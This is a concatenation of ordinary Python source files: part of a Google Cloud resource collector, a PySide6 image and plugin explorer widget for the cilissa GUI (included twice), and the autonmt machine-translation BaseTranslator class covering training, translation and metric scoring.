"timeout": "timeoutSec", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_https_health_checks.time() def collect_https_health_checks(self): self.collect_something( resource_class=GCPHTTPSHealthCheck, attr_map={ "check_interval": "checkIntervalSec", "healthy_threshold": "healthyThreshold", "unhealthy_threshold": "unhealthyThreshold", "timeout": "timeoutSec", "health_check_type": "type", "host": "host", "request_path": "requestPath", "port": "port", }, ) @metrics_collect_url_maps.time() def collect_url_maps(self): self.collect_something( resource_class=GCPUrlMap, paginate_method_name="aggregatedList", search_map={ "__default_service": ["link", "defaultService"], }, successors=["__default_service"], ) @metrics_collect_target_pools.time() def collect_target_pools(self): self.collect_something( resource_class=GCPTargetPool, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__instances": ["link", "instances"], }, attr_map={ "session_affinity": "sessionAffinity", "failover_ratio": "failoverRatio", }, predecessors=["__instances", "__health_checks"], ) @metrics_collect_target_instances.time() def collect_target_instances(self): self.collect_something( resource_class=GCPTargetInstance, paginate_method_name="aggregatedList", search_map={ "__instance": ["link", "instance"], }, predecessors=["__instance"], ) @metrics_collect_target_http_proxies.time() def collect_target_http_proxies(self): self.collect_something( resource_class=GCPTargetHttpProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_target_https_proxies.time() def collect_target_https_proxies(self): self.collect_something( resource_class=GCPTargetHttpsProxy, paginate_method_name="aggregatedList", search_map={ "__url_map": ["link", "urlMap"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__url_map", "__ssl_certificates"], ) @metrics_collect_target_ssl_proxies.time() def collect_target_ssl_proxies(self): self.collect_something( resource_class=GCPTargetSslProxy, search_map={ "__service": ["link", "service"], "__ssl_certificates": ["link", "sslCertificates"], }, predecessors=["__service", "__ssl_certificates"], ) @metrics_collect_target_tcp_proxies.time() def collect_target_tcp_proxies(self): self.collect_something( resource_class=GCPTargetTcpProxy, search_map={ "__service": ["link", "service"], }, predecessors=["__service"], ) @metrics_collect_target_grpc_proxies.time() def collect_target_grpc_proxies(self): self.collect_something( resource_class=GCPTargetGrpcProxy, search_map={ "__url_map": ["link", "urlMap"], }, predecessors=["__url_map"], ) @metrics_collect_backend_services.time() def collect_backend_services(self): self.collect_something( resource_class=GCPBackendService, paginate_method_name="aggregatedList", search_map={ "__health_checks": ["link", "healthChecks"], "__backends": [ "link", (lambda r: [g.get("group", "") for g in r.get("backends", [])]), ], }, predecessors=["__health_checks", "__backends"], ) @metrics_collect_forwarding_rules.time() def collect_forwarding_rules(self): def post_process(resource: GCPForwardingRule, graph: Graph): instances = [ i.name for i in resource.ancestors(graph) if isinstance(i, GCPInstance) ] if len(instances) > 0: resource.backends = sorted(instances) self.collect_something( resource_class=GCPForwardingRule, paginate_method_name="aggregatedList", attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], post_process=post_process, ) @metrics_collect_global_forwarding_rules.time() def collect_global_forwarding_rules(self): self.collect_something( resource_class=GCPGlobalForwardingRule, attr_map={ "ip_address": "IPAddress", "ip_protocol": "IPProtocol", "load_balancing_scheme": "loadBalancingScheme", "network_tier": "networkTier", "port_range": "portRange", }, search_map={ "__target": ["link", "target"], }, predecessors=["__target"], ) @metrics_collect_buckets.time() def collect_buckets(self): self.collect_something( resource_class=GCPBucket, attr_map={ "ctime": lambda r: iso2datetime(r.get("timeCreated")), "mtime": lambda r: iso2datetime(r.get("updated")), "bucket_location": "location", "bucket_location_type": "locationType", "storage_class": "storageClass", "zone_separation": "zoneSeparation", }, ) @metrics_collect_databases.time() def collect_databases(self): self.collect_something( resource_class=GCPDatabase, attr_map={ "db_type": "databaseVersion", "db_status": "state", "db_endpoint": lambda r: next( iter( [ ip["ipAddress"] for ip in r.get("ipAddresses", []) if ip.get("type") == "PRIMARY" ] ), None, ), "instance_type": lambda r: r.get("settings", {}).get("tier"), "volume_size": lambda r: int( r.get("settings", {}).get("dataDiskSizeGb", -1) ), "tags": lambda r: r.get("settings", {}).get("userLabels", {}), }, search_map={ "_region": ["name", "region"], "_zone": ["name", "gceZone"], }, ) @metrics_collect_services.time() def collect_services(self): def post_process(service: GCPService, graph: Graph): # Right now we are only interested in Compute Engine pricing if service.name != "Compute Engine": return gs = gcp_client("cloudbilling", "v1", credentials=self.credentials) kwargs = {"parent": f"services/{service.id}"} for r in paginate( gcp_resource=gs.services().skus(), method_name="list", items_name="skus", **kwargs, ): sku = GCPServiceSKU( r["skuId"], {}, name=r.get("description"), service=r.get("category", {}).get("serviceDisplayName"), resource_family=r.get("category", {}).get("resourceFamily"), resource_group=r.get("category", {}).get("resourceGroup"), usage_type=r.get("category", {}).get("usageType"), pricing_info=r.get("pricingInfo"), service_provider_name=r.get("serviceProviderName"), geo_taxonomy_type=r.get("geoTaxonomy", {}).get("type"), geo_taxonomy_regions=r.get("geoTaxonomy", {}).get("regions"), link=( f"https://{service.client}.googleapis.com/" f"{service.api_version}/{r.get('name')}" ), _account=service.account(graph), _region=service.region(graph), _zone=service.zone(graph), ) graph.add_resource(service, sku) self.collect_something( resource_class=GCPService, paginate_method_name="list", paginate_items_name="services", attr_map={ "id": "serviceId", "name": "displayName", }, post_process=post_process, ) @metrics_collect_instance_templates.time() def collect_instance_templates(self): self.collect_something( resource_class=GCPInstanceTemplate, search_map={ "__machine_type": ["link", "machineType"], }, predecessors=["__machine_type"], )
import importlib import inspect import os from pathlib import Path from PySide6.QtCore import QDir, QSize from PySide6.QtWidgets import QFileDialog, QListWidget, QTabWidget from cilissa.images import Image from cilissa.operations import Metric, Transformation from cilissa_gui.decorators import PathInsert from cilissa_gui.widgets import CQImageItem, CQInfoDialog, CQOperationItem class Explorer(QTabWidget): IMAGE_EXTENSIONS = ["*.png", "*.jpg", "*.jpeg", "*.bmp", "*.tiff"] def __init__(self) -> None: super().__init__() self.images_tab = ImagesTab(self) self.metrics_tab = MetricsTab(self) self.transformations_tab = TransformationsTab(self) self.addTab(self.images_tab, "Images") self.addTab(self.metrics_tab, "Metrics") self.addTab(self.transformations_tab, "Transformations") self.currentChanged.connect(self.clear_selection_in_tabs) def clear_selection_in_tabs(self) -> None: for index in range(self.count()): self.widget(index).clearSelection() def open_image_dialog(self) -> None: # This returns a tuple ([filenames], "filter"), we are interested only in the filenames filenames = QFileDialog.getOpenFileNames( self, "Open images...", "", f"Images ({" ".join([ext for ext in self.IMAGE_EXTENSIONS])})" )[0] for fn in filenames: image = Image(fn) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def open_image_folder_dialog(self) -> None: dirname = QFileDialog.getExistingDirectory(self, "Open images folder...", "", QFileDialog.ShowDirsOnly) d = QDir(dirname) if dirname and not d.entryList(self.IMAGE_EXTENSIONS): dialog = CQInfoDialog("No images found in the selected folder", "No images found") dialog.exec() return for fn in d.entryList(self.IMAGE_EXTENSIONS): image = Image(Path(dirname, fn)) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def load_plugin(self) -> None: filename = QFileDialog.getOpenFileName(self, "Open Python plugin", "", "Python files (*.py)")[0] with PathInsert(os.path.dirname(filename)): spec = importlib.util.spec_from_file_location(filename, filename) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) for _, attr in inspect.getmembers(module): if not inspect.isclass(attr): continue if issubclass(attr, Metric) and attr != Metric: self.metrics_tab.addItem(CQOperationItem(attr)) elif issubclass(attr, Transformation) and attr != Transformation: self.transformations_tab.addItem(CQOperationItem(attr)) class ExplorerTab(QListWidget): def __init__(self, parent: QTabWidget) -> None: super().__init__() self.setViewMode(QListWidget.IconMode) self.setIconSize(QSize(82, 82)) self.setUniformItemSizes(True) self.setMovement(QListWidget.Static) self.setResizeMode(QListWidget.Adjust) self.setFrameStyle(QListWidget.NoFrame) self.setMaximumWidth(parent.width()) def remove_selected(self) -> None: rows = [index.row() for index in self.selectedIndexes()] for row in reversed(rows): self.takeItem(row) class ImagesTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) self.setSelectionMode(QListWidget.ExtendedSelection) class MetricsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for metric in Metric.get_subclasses(): self.addItem(CQOperationItem(metric)) class TransformationsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for transformation in Transformation.get_subclasses(): self.addItem(CQOperationItem(transformation))
import importlib import inspect import os from pathlib import Path from PySide6.QtCore import QDir, QSize from PySide6.QtWidgets import QFileDialog, QListWidget, QTabWidget from cilissa.images import Image from cilissa.operations import Metric, Transformation from cilissa_gui.decorators import PathInsert from cilissa_gui.widgets import CQImageItem, CQInfoDialog, CQOperationItem class Explorer(QTabWidget): IMAGE_EXTENSIONS = ["*.png", "*.jpg", "*.jpeg", "*.bmp", "*.tiff"] def __init__(self) -> None: super().__init__() self.images_tab = ImagesTab(self) self.metrics_tab = MetricsTab(self) self.transformations_tab = TransformationsTab(self) self.addTab(self.images_tab, "Images") self.addTab(self.metrics_tab, "Metrics") self.addTab(self.transformations_tab, "Transformations") self.currentChanged.connect(self.clear_selection_in_tabs) def clear_selection_in_tabs(self) -> None: for index in range(self.count()): self.widget(index).clearSelection() def open_image_dialog(self) -> None: # This returns a tuple ([filenames], "filter"), we are interested only in the filenames filenames = QFileDialog.getOpenFileNames( self, "Open images...", "", f"Images ({' '.join([ext for ext in self.IMAGE_EXTENSIONS])})" )[0] for fn in filenames: image = Image(fn) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def open_image_folder_dialog(self) -> None: dirname = QFileDialog.getExistingDirectory(self, "Open images folder...", "", QFileDialog.ShowDirsOnly) d = QDir(dirname) if dirname and not d.entryList(self.IMAGE_EXTENSIONS): dialog = CQInfoDialog("No images found in the selected folder", "No images found") dialog.exec() return for fn in d.entryList(self.IMAGE_EXTENSIONS): image = Image(Path(dirname, fn)) cq_image = CQImageItem(image, width=128, height=128) self.images_tab.addItem(cq_image) def load_plugin(self) -> None: filename = QFileDialog.getOpenFileName(self, "Open Python plugin", "", "Python files (*.py)")[0] with PathInsert(os.path.dirname(filename)): spec = importlib.util.spec_from_file_location(filename, filename) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) for _, attr in inspect.getmembers(module): if not inspect.isclass(attr): continue if issubclass(attr, Metric) and attr != Metric: self.metrics_tab.addItem(CQOperationItem(attr)) elif issubclass(attr, Transformation) and attr != Transformation: self.transformations_tab.addItem(CQOperationItem(attr)) class ExplorerTab(QListWidget): def __init__(self, parent: QTabWidget) -> None: super().__init__() self.setViewMode(QListWidget.IconMode) self.setIconSize(QSize(82, 82)) self.setUniformItemSizes(True) self.setMovement(QListWidget.Static) self.setResizeMode(QListWidget.Adjust) self.setFrameStyle(QListWidget.NoFrame) self.setMaximumWidth(parent.width()) def remove_selected(self) -> None: rows = [index.row() for index in self.selectedIndexes()] for row in reversed(rows): self.takeItem(row) class ImagesTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) self.setSelectionMode(QListWidget.ExtendedSelection) class MetricsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for metric in Metric.get_subclasses(): self.addItem(CQOperationItem(metric)) class TransformationsTab(ExplorerTab): def __init__(self, parent: QTabWidget) -> None: super().__init__(parent) for transformation in Transformation.get_subclasses(): self.addItem(CQOperationItem(transformation))
import os.path import shutil from abc import ABC, abstractmethod from typing import List, Set from autonmt.bundle.metrics import * from autonmt.bundle.utils import * from autonmt.preprocessing.dataset import Dataset from autonmt.preprocessing.processors import normalize_file, pretokenize_file, encode_file, decode_file def _check_datasets(train_ds: Dataset = None, eval_ds: Dataset = None): # Check that train_ds is a Dataset if train_ds and not isinstance(train_ds, Dataset): raise TypeError("'train_ds' must be an instance of 'Dataset' so that we can know the layout of the trained " "model (e.g. checkpoints available, subword model, vocabularies, etc") # Check that train_ds is a Dataset if eval_ds and not isinstance(eval_ds, Dataset): raise TypeError("'eval_ds' must be an instance of 'Dataset' so that we can know the layout of the dataset " "and get the corresponding data (e.g. splits, pretokenized, encoded, stc)") # Check that the preprocessing are compatible if train_ds and eval_ds and ((train_ds.src_lang != eval_ds.src_lang) or (train_ds.trg_lang != eval_ds.trg_lang)): raise ValueError(f"The languages from the train and test datasets are not compatible:\n" f"\t- train_lang_pair=({train_ds.dataset_lang_pair})\n" f"\t- test_lang_pair=({eval_ds.dataset_lang_pair})\n") def _check_supported_metrics(metrics, metrics_supported): # Check metrics = set(metrics) metrics_supported = set(metrics_supported) # Get valid metrics metrics_valid = list(metrics.intersection(metrics_supported)) metrics_valid += [x for x in metrics if x.startswith("hg_")] # Ignore huggingface metrics metrics_valid = set(metrics_valid) metrics_non_valid = metrics.difference(metrics_valid) if metrics_non_valid: print(f"=> [WARNING] These metrics are not supported: {str(metrics_non_valid)}") if metrics == metrics_non_valid: print("\t- [Score]: Skipped. No valid metrics were found.") return metrics_valid class BaseTranslator(ABC): # Global variables total_runs = 0 TOOL_PARSERS = {"sacrebleu": {"filename": "sacrebleu_scores", "py": (parse_sacrebleu_json, "json")}, "bertscore": {"filename": "bertscore_scores", "py": (parse_bertscore_json, "json")}, "comet": {"filename": "comet_scores", "py": (parse_comet_json, "json")}, "beer": {"filename": "beer_scores", "py": (parse_beer_json, "json")}, "huggingface": {"filename": "huggingface_scores", "py": (parse_huggingface_json, "json")}, "fairseq": {"filename": "fairseq_scores", "py": (parse_fairseq_txt, "txt")}, } TOOL2METRICS = {"sacrebleu": {"bleu", "chrf", "ter"}, "bertscore": {"bertscore"}, "comet": {"comet"}, "beer": {"beer"}, "fairseq": {"fairseq"}, # "huggingface": "huggingface", } METRICS2TOOL = {m: tool for tool, metrics in TOOL2METRICS.items() for m in metrics} def __init__(self, engine, run_prefix="model", model_ds=None, src_vocab=None, trg_vocab=None, safe_seconds=3, **kwargs): # Store vars self.engine = engine self.run_prefix = run_prefix self.model_ds = model_ds self.config = {} self.model_ds = None self.safe_seconds = safe_seconds # Set vocab (optional) self.src_vocab = src_vocab self.trg_vocab = trg_vocab # Check dataset _check_datasets(train_ds=self.model_ds) if self.model_ds else None def _get_metrics_tool(self, metrics): tools = set() for m in metrics: if m.startswith("hg_"): m_tool = "huggingface" else: m_tool = self.METRICS2TOOL.get(m) # Add tools if m_tool: tools.add(m_tool) return tools def _add_config(self, key: str, values: dict, reset=False): def is_valid(k, v): primitive_types = (str, bool, int, float, dict, set, list) # Problems with list of objects return not(k.startswith("_") or k in {"kwargs"}) and (isinstance(v, primitive_types) or v is None) def parse_value(x): if isinstance(x, (list, set)): return [str(_x) for _x in x] return str(x) # Reset value (if needed) if reset or key not in self.config: self.config[key] = {} # Update values self.config[key].update({k: parse_value(v) for k, v in values.items() if is_valid(k, v)}) def fit(self, train_ds, max_tokens=None, batch_size=128, max_epochs=1, learning_rate=0.001, optimizer="adam", weight_decay=0, gradient_clip_val=0.0, accumulate_grad_batches=1, criterion="cross_entropy", patience=None, seed=None, devices="auto", accelerator="auto", num_workers=0, monitor="loss", resume_training=False, force_overwrite=False, **kwargs): print("=> [Fit]: Started.") # Set model self.model_ds = train_ds # Store config (and save file) self._add_config(key="fit", values=locals(), reset=False) self._add_config(key="fit", values=kwargs, reset=False) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=train_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_train.json")) # Train and preprocess self.preprocess(train_ds, force_overwrite=force_overwrite, **kwargs) self.train(train_ds, max_tokens=max_tokens, batch_size=batch_size, max_epochs=max_epochs, learning_rate=learning_rate, optimizer=optimizer, weight_decay=weight_decay, gradient_clip_val=gradient_clip_val, accumulate_grad_batches=accumulate_grad_batches, criterion=criterion, patience=patience, seed=seed, devices=devices, accelerator=accelerator, num_workers=num_workers, monitor=monitor, resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) def predict(self, eval_datasets: List[Dataset], beams: List[int] = None, metrics: Set[str] = None, batch_size=64, max_tokens=None, max_len_a=1.2, max_len_b=50, truncate_at=None, devices="auto", accelerator="auto", num_workers=0, load_best_checkpoint=False, model_ds=None, force_overwrite=False, **kwargs): print("=> [Predict]: Started.") # Set default values if beams is None: beams = [5] else: beams = list(set(beams)) beams.sort(reverse=True) # Default metrics if metrics is None: metrics = {"bleu"} else: metrics = set(metrics) # Get model dataset if model_ds: self.model_ds = model_ds elif self.model_ds: pass else: raise ValueError(f"Missing 'model_ds'. It's needed to get the model's path (training and eval).") # Store config self._add_config(key="predict", values=locals(), reset=False) self._add_config(key="predict", values=kwargs, reset=False) logs_path = self.model_ds.get_model_logs_path(toolkit=self.engine, run_name=self.model_ds.get_run_name(self.run_prefix)) make_dir(logs_path) save_json(self.config, savepath=os.path.join(logs_path, "config_predict.json")) # Translate and score eval_scores = [] eval_datasets = self.model_ds.get_eval_datasets(eval_datasets) for eval_ds in eval_datasets: self.translate(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, max_len_a=max_len_a, max_len_b=max_len_b, truncate_at=truncate_at, batch_size=batch_size, max_tokens=max_tokens, devices=devices, accelerator=accelerator, num_workers=num_workers, load_best_checkpoint=load_best_checkpoint, force_overwrite=force_overwrite, **kwargs) self.score(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, force_overwrite=force_overwrite, **kwargs) model_scores = self.parse_metrics(model_ds=self.model_ds, eval_ds=eval_ds, beams=beams, metrics=metrics, engine=self.engine, force_overwrite=force_overwrite, **kwargs) eval_scores.append(model_scores) return eval_scores @abstractmethod def _preprocess(self, *args, **kwargs): pass def preprocess(self, ds: Dataset, force_overwrite, **kwargs): print(f"=> [Preprocess]: Started. ({ds.id2(as_path=True)})") # Set vars src_lang = ds.src_lang trg_lang = ds.trg_lang train_path = ds.get_encoded_path(fname=ds.train_name) val_path = ds.get_encoded_path(fname=ds.val_name) test_path = ds.get_encoded_path(fname=ds.test_name) model_src_vocab_path = ds.get_vocab_file(lang=src_lang) model_trg_vocab_path = ds.get_vocab_file(lang=trg_lang) model_data_bin_path = ds.get_model_data_bin(toolkit=self.engine) # Create dirs make_dir([model_data_bin_path]) start_time = time.time() self._preprocess(ds=ds, src_lang=src_lang, trg_lang=trg_lang, output_path=model_data_bin_path, train_path=train_path, val_path=val_path, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Preprocess time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _train(self, *args, **kwargs): pass def train(self, train_ds: Dataset, resume_training, force_overwrite, **kwargs): print(f"=> [Train]: Started. ({train_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=train_ds) # Check debug if is_debug_enabled(): print("\t=> [WARNING]: Debug is enabled. This could lead to critical problems when using a data parallel strategy.") # Set run name run_name = train_ds.get_run_name(self.run_prefix) # Set paths data_bin_path = train_ds.get_model_data_bin(toolkit=self.engine) checkpoints_dir = train_ds.get_model_checkpoints_path(toolkit=self.engine, run_name=run_name) logs_path = train_ds.get_model_logs_path(toolkit=self.engine, run_name=run_name) # Create dirs make_dir([data_bin_path, checkpoints_dir, logs_path]) # Set seed self.manual_seed(seed=kwargs.get("seed")) start_time = time.time() self._train(data_bin_path=data_bin_path, checkpoints_dir=checkpoints_dir, logs_path=logs_path, run_name=run_name, ds_alias='_'.join(train_ds.id()), resume_training=resume_training, force_overwrite=force_overwrite, **kwargs) print(f"\t- [INFO]: Training time: {str(datetime.timedelta(seconds=time.time()-start_time))}") @abstractmethod def _translate(self, *args, **kwargs): pass def translate(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], max_len_a, max_len_b, truncate_at, batch_size, max_tokens, num_workers, force_overwrite, **kwargs): print(f"=> [Translate]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Checkpoints dir checkpoints_dir = model_ds.get_model_checkpoints_path(self.engine, run_name) # [Trained model]: Create eval folder model_src_vocab_path = model_ds.get_vocab_file(lang=model_ds.src_lang) # Needed to preprocess model_trg_vocab_path = model_ds.get_vocab_file(lang=model_ds.trg_lang) # Needed to preprocess model_eval_data_path = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) model_eval_data_bin_path = model_ds.get_model_eval_data_bin_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create dirs make_dir([model_eval_data_path, model_eval_data_bin_path]) # [Encode extern data]: Encode test data using the subword model of the trained model for ts_fname in [fname for fname in eval_ds.split_names_lang if eval_ds.test_name in fname]: lang = ts_fname.split('.')[-1] input_file = eval_ds.get_split_path(ts_fname) # as raw as possible output_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name) # Create directories make_dir([ os.path.join(output_file, "raw"), os.path.join(output_file, "normalized"), os.path.join(output_file, "tokenized"), os.path.join(output_file, "encoded"), ]) # Copy raw raw_file = os.path.join(output_file, "raw", ts_fname) shutil.copyfile(input_file, raw_file) input_file = raw_file # Normalize data norm_file = os.path.join(output_file, "normalized", ts_fname) normalize_file(input_file=input_file, output_file=norm_file, normalizer=model_ds.normalizer, force_overwrite=force_overwrite) input_file = norm_file # Pretokenize data (if needed) if model_ds.pretok_flag: pretok_file = os.path.join(output_file, "tokenized", ts_fname) pretokenize_file(input_file=input_file, output_file=pretok_file, lang=lang, force_overwrite=force_overwrite) input_file = pretok_file # Encode file enc_file = os.path.join(output_file, "encoded", ts_fname) encode_file(ds=model_ds, input_file=input_file, output_file=enc_file, lang=lang, merge_vocabs=model_ds.merge_vocabs, truncate_at=truncate_at, force_overwrite=force_overwrite) # Preprocess external data test_path = os.path.join(model_eval_data_path, "encoded", eval_ds.test_name) self._preprocess(ds=model_ds, src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, output_path=model_eval_data_bin_path, train_path=None, val_path=None, test_path=test_path, src_vocab_path=model_src_vocab_path, trg_vocab_path=model_trg_vocab_path, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, external_data=True, force_overwrite=force_overwrite, **kwargs) # Iterate over beams for beam in beams: start_time = time.time() # Create output path (if needed) output_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) make_dir(output_path) # Translate tok_flag = [os.path.exists(os.path.join(output_path, f)) for f in ["hyp.tok"]] if force_overwrite or not all(tok_flag): self._translate( src_lang=model_ds.src_lang, trg_lang=model_ds.trg_lang, beam_width=beam, max_len_a=max_len_a, max_len_b=max_len_b, batch_size=batch_size, max_tokens=max_tokens, data_bin_path=model_eval_data_bin_path, output_path=output_path, checkpoints_dir=checkpoints_dir, model_src_vocab_path=model_src_vocab_path, model_trg_vocab_path=model_trg_vocab_path, num_workers=num_workers, model_ds=model_ds, force_overwrite=force_overwrite, **kwargs) # Copy src/ref raw for fname, lang in [("src", model_ds.src_lang), ("ref", model_ds.trg_lang)]: raw_file = model_ds.get_model_eval_data_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, fname=f"normalized/test.{lang}") output_file = os.path.join(output_path, f"{fname}.txt") shutil.copyfile(raw_file, output_file) # Postprocess tokenized files for fname, lang in [("hyp", model_ds.trg_lang)]: input_file = os.path.join(output_path, f"{fname}.tok") output_file = os.path.join(output_path, f"{fname}.txt") model_vocab_path = model_src_vocab_path if lang == model_ds.src_lang else model_trg_vocab_path # Post-process files decode_file(input_file=input_file, output_file=output_file, lang=lang, subword_model=model_ds.subword_model, pretok_flag=model_ds.pretok_flag, model_vocab_path=model_vocab_path, remove_unk_hyphen=True, force_overwrite=force_overwrite) # Check amount of lines ref_lines = len(open(os.path.join(output_path, "ref.txt"), 'r').readlines()) hyp_lines = len(open(os.path.join(output_path, "hyp.txt"), 'r').readlines()) if ref_lines != hyp_lines: raise ValueError(f"The number of lines in 'ref.txt' ({ref_lines}) and 'hyp.txt' ({hyp_lines}) " f"does not match. If you see a 'CUDA out of memory' message, try again with " f"smaller batch.") print(f"\t- [INFO]: Translating time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def score(self, model_ds: Dataset, eval_ds: Dataset, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Score]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Iterate over beams for beam in beams: start_time = time.time() # Paths beam_path = model_ds.get_model_beam_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Create dirs make_dir([scores_path]) # Set input files (results) src_file_path = os.path.join(beam_path, "src.txt") ref_file_path = os.path.join(beam_path, "ref.txt") hyp_file_path = os.path.join(beam_path, "hyp.txt") # Check that the paths exists if not all([os.path.exists(p) for p in [src_file_path, ref_file_path, hyp_file_path]]): raise IOError("Missing files to compute scores") # Score: bleu, chrf and ter if self.TOOL2METRICS["sacrebleu"].intersection(metrics): output_file = os.path.join(scores_path, f"sacrebleu_scores.json") if force_overwrite or not os.path.exists(output_file): compute_sacrebleu(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, metrics=metrics) # Score: bertscore if self.TOOL2METRICS["bertscore"].intersection(metrics): output_file = os.path.join(scores_path, f"bertscore_scores.json") if force_overwrite or not os.path.exists(output_file): compute_bertscore(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file, trg_lang=model_ds.trg_lang) # Score: comet if self.TOOL2METRICS["comet"].intersection(metrics): output_file = os.path.join(scores_path, f"comet_scores.json") if force_overwrite or not os.path.exists(output_file): compute_comet(src_file=src_file_path, ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Score: fairseq if self.TOOL2METRICS["fairseq"].intersection(metrics): output_file = os.path.join(scores_path, f"fairseq_scores.txt") if force_overwrite or not os.path.exists(output_file): compute_fairseq(ref_file=ref_file_path, hyp_file=hyp_file_path, output_file=output_file) # Huggingface metrics hg_metrics = {x[3:] for x in metrics if x.startswith("hg_")} if hg_metrics: output_file = os.path.join(scores_path, f"huggingface_scores.json") if force_overwrite or not os.path.exists(output_file): compute_huggingface(src_file=src_file_path, hyp_file=hyp_file_path, ref_file=ref_file_path, output_file=output_file, metrics=hg_metrics, trg_lang=model_ds.trg_lang) print(f"\t- [INFO]: Scoring time (beam={str(beam)}): {str(datetime.timedelta(seconds=time.time() - start_time))}") def parse_metrics(self, model_ds, eval_ds, beams: List[int], metrics: Set[str], force_overwrite, **kwargs): print(f"=> [Parsing]: Started. ({model_ds.id2(as_path=True)})") # Check preprocessing _check_datasets(train_ds=model_ds, eval_ds=eval_ds) assert model_ds.dataset_lang_pair == eval_ds.dataset_lang_pair # Check supported metrics metrics_valid = _check_supported_metrics(metrics, self.METRICS2TOOL.keys()) if not metrics_valid: return # Metrics to retrieve metric_tools = self._get_metrics_tool(metrics) # Set run names run_name = model_ds.get_run_name(self.run_prefix) eval_name = '_'.join(eval_ds.id()) # Subword model and vocab size don't characterize the dataset! # Walk through beams scores = { "engine": kwargs.get("engine"), "lang_pair": model_ds.dataset_lang_pair, "train_dataset": model_ds.dataset_name, "eval_dataset": eval_ds.dataset_name, "subword_model": str(model_ds.subword_model).lower(), "vocab_size": str(model_ds.vocab_size).lower(), "run_name": run_name, "train_max_lines": model_ds.dataset_lines, "beams": {}, "config": self.config, } # Iterate over beams for beam in beams: # Paths scores_path = model_ds.get_model_scores_path(toolkit=self.engine, run_name=run_name, eval_name=eval_name, beam=beam) # Walk through metric files beam_scores = {} for m_tool in metric_tools: values = self.TOOL_PARSERS[m_tool] m_parser, ext = values["py"] m_fname = f"{values["filename"]}.{ext}" # Read file filename = os.path.join(scores_path, m_fname) if os.path.exists(filename): try: with open(filename, 'r') as f: m_scores = m_parser(text=f.readlines()) for m_name, m_values in m_scores.items(): # [bleu_score, chrf_score, ter_score], [bertscore_precision] for score_name, score_value in m_values.items(): m_name_full = f"{m_tool}_{m_name}_{score_name}".lower().strip() beam_scores[m_name_full] = score_value except Exception as e: print(f"\t- [PARSING ERROR]: ({m_fname}) {str(e)}") else: print(f"\t- [WARNING]: There are no metrics from '{m_tool}'") # Add beam scores scores["beams"].update({f"beam{str(beam)}": beam_scores}) return scores @staticmethod def manual_seed(seed, use_deterministic_algorithms=False): import torch import random import numpy as np from pytorch_lightning.utilities.seed import seed_everything # Define seed seed = seed if seed is not None else int(time.time()) % 2**32 # Set seeds random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) seed_everything(seed) # Tricky: https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html torch.use_deterministic_algorithms(use_deterministic_algorithms) # Test randomness print(f"\t- [INFO]: Testing random seed ({seed}):") print(f"\t\t- random: {random.random()}") print(f"\t\t- numpy: {np.random.rand(1)}") print(f"\t\t- torch: {torch.rand(1)}") return seed
